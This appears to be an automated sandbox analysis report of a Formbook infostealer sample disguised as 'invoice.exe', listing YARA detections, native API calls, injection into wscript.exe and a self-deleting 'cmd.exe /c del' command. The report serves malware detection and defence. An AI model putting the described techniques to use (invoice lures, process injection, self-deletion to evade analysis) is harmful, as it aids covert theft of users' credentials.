          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000009.00000002.490575290.0000000002AE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.490575290.0000000002AE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.287914993.0000000001AE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.287914993.0000000001AE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.286861103.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.286861103.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.287952464.0000000001B10000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.287952464.0000000001B10000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.490405309.00000000026A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.490405309.00000000026A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.488897398.00000000021B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.488897398.00000000021B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.246170025.0000000003EAC000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.246170025.0000000003EAC000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.invoice.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.invoice.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.invoice.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.invoice.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: invoice.exe
          Source: C:\Users\user\Desktop\invoice.exeCode function: 3_2_004181D0 NtCreateFile,
          Source: C:\Users\user\Desktop\invoice.exeCode function: 3_2_00418280 NtReadFile,
          Source: C:\Users\user\Desktop\invoice.exeCode function: 3_2_00418300 NtClose,
          Source: C:\Users\user\Desktop\invoice.exeCode function: 3_2_004183B0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\invoice.exeCode function: 3_2_0041827A NtReadFile,
          Source: C:\Users\user\Desktop\invoice.exeCode function: 3_2_004182FB NtReadFile,
          Source: C:\Users\user\Desktop\invoice.exeCode function: 3_2_004183AA NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046AAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046AA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046AA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046AB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046AA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_021C8280 NtReadFile,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_021C8300 NtClose,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_021C83B0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_021C81D0 NtCreateFile,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_021C827A NtReadFile,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_021C82FB NtReadFile,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_021C83AA NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00802050
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_011794A8
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_0117DCF4
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_0117C148
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_0117E218
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_0117A748
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_0117DCE8
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_02BF0040
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_02BF5930
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_02BF1331
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_02BF1340
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_02BF0006
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_02BF5558
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_02BF5548
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_02BF1A38
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_02BF1A27
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_02BF5B95
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_02BF5B3B
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_02BF5B5A
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_02BF28F7
          Source: C:\Users\user\Desktop\invoice.exeCode function: 3_2_0041C803
          Source: C:\Users\user\Desktop\invoice.exeCode function: 3_2_00401030
          Source: C:\Users\user\Desktop\invoice.exeCode function: 3_2_00408C6B
          Source: C:\Users\user\Desktop\invoice.exeCode function: 3_2_00408C70
          Source: C:\Users\user\Desktop\invoice.exeCode function: 3_2_00402D90
          Source: C:\Users\user\Desktop\invoice.exeCode function: 3_2_0041C598
          Source: C:\Users\user\Desktop\invoice.exeCode function: 3_2_00402FB0
          Source: C:\Users\user\Desktop\invoice.exeCode function: 3_2_00D72050
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0472D466
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0467841F
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04731D55
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04660D20
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04732D07
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0467D5E0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_047325DD
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04692581
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04686E30
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0472D616
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04732EF7
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04731FF1
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04721002
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_047328EC
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046920A0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_047320A8
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0467B090
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04684120
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0466F900
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_047322AE
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04732B28
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0472DBD2
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0469EBB0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_021CC803
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_021B2FB0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_021B8C70
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_021B8C6B
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_021CC598
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_021B2D90
          Source: C:\Windows\SysWOW64\wscript.exeCode function: String function: 0466B150 appears 35 times
          Source: invoice.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: invoice.exeBinary or memory string: OriginalFilename vs invoice.exe
          Source: invoice.exe, 00000000.00000000.221487542.0000000000802000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCharTypeInfo.exeD vs invoice.exe
          Source: invoice.exe, 00000000.00000002.253920792.00000000074A0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameDSASignature.dll" vs invoice.exe
          Source: invoice.exe, 00000000.00000002.245256874.0000000002EBE000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSimpleUI.dll2 vs invoice.exe
          Source: invoice.exeBinary or memory string: OriginalFilename vs invoice.exe
          Source: invoice.exe, 00000003.00000000.241463096.0000000000D72000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCharTypeInfo.exeD vs invoice.exe
          Source: invoice.exe, 00000003.00000002.288057088.0000000001B70000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs invoice.exe
          Source: invoice.exe, 00000003.00000002.287622749.00000000018CF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs invoice.exe
          Source: invoice.exeBinary or memory string: OriginalFilenameCharTypeInfo.exeD vs invoice.exe
          Source: invoice.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000009.00000002.490575290.0000000002AE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.490575290.0000000002AE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.287914993.0000000001AE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.287914993.0000000001AE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.286861103.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.286861103.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.287952464.0000000001B10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.287952464.0000000001B10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.490405309.00000000026A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.490405309.00000000026A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.488897398.00000000021B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.488897398.00000000021B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.246170025.0000000003EAC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.246170025.0000000003EAC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.invoice.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.invoice.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.invoice.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.invoice.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: invoice.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@15/8
          Source: C:\Users\user\Desktop\invoice.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\invoice.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6196:120:WilError_01
          Source: invoice.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\invoice.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\invoice.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: invoice.exe, 00000000.00000002.245201549.0000000002EB3000.00000004.00000001.sdmpBinary or memory string: Select * from UnmanagedMemoryStreamWrapper WHERE modelo=@modelo;?
          Source: invoice.exe, 00000000.00000002.245201549.0000000002EB3000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
          Source: invoice.exe, 00000000.00000002.245201549.0000000002EB3000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel5Erro ao listar Banco sql-UnmanagedMemoryStreamWrapper.INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: invoice.exe, 00000000.00000002.245201549.0000000002EB3000.00000004.00000001.sdmpBinary or memory string: INSERT INTO UnmanagedMemoryStreamWrapper VALUES(@modelo, @fabricante, @ano, @cor);
          Source: invoice.exe, 00000000.00000002.245201549.0000000002EB3000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
          Source: invoice.exe, 00000000.00000002.245201549.0000000002EB3000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
          Source: invoice.exe, 00000000.00000002.245201549.0000000002EB3000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: unknownProcess created: C:\Users\user\Desktop\invoice.exe 'C:\Users\user\Desktop\invoice.exe'
          Source: C:\Users\user\Desktop\invoice.exeProcess created: C:\Users\user\Desktop\invoice.exe C:\Users\user\Desktop\invoice.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\invoice.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\invoice.exeProcess created: C:\Users\user\Desktop\invoice.exe C:\Users\user\Desktop\invoice.exe
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\invoice.exe'
          Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: invoice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: invoice.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscript.pdbGCTL source: invoice.exe, 00000003.00000002.288057088.0000000001B70000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: invoice.exe, 00000003.00000002.287622749.00000000018CF000.00000040.00000001.sdmp, wscript.exe, 00000009.00000002.492637672.000000000475F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: invoice.exe, 00000003.00000002.287622749.00000000018CF000.00000040.00000001.sdmp, wscript.exe
          Source: Binary string: wscript.pdb source: invoice.exe, 00000003.00000002.288057088.0000000001B70000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_0081855F push dword ptr [esi+3Fh]; iretd
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_008192CB push FFFFFFD9h; iretd
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_02BF6A44 push A1FFFFFEh; ret
          Source: C:\Users\user\Desktop\invoice.exeCode function: 3_2_004161E2 push 00000062h; ret
          Source: C:\Users\user\Desktop\invoice.exeCode function: 3_2_0041B3C5 push eax; ret
          Source: C:\Users\user\Desktop\invoice.exeCode function: 3_2_0041B47C push eax; ret
          Source: C:\Users\user\Desktop\invoice.exeCode function: 3_2_0041B412 push eax; ret
          Source: C:\Users\user\Desktop\invoice.exeCode function: 3_2_0041B41B push eax; ret
          Source: C:\Users\user\Desktop\invoice.exeCode function: 3_2_004157E0 push esi; ret
          Source: C:\Users\user\Desktop\invoice.exeCode function: 3_2_00D892CB push FFFFFFD9h; iretd
          Source: C:\Users\user\Desktop\invoice.exeCode function: 3_2_00D8855F push dword ptr [esi+3Fh]; iretd
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046BD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_021CB3C5 push eax; ret
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_021C61E2 push 00000062h; ret
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_021C57E0 push esi; ret
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_021CB41B push eax; ret
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_021CB412 push eax; ret
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_021CB47C push eax; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.55515603565
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOX
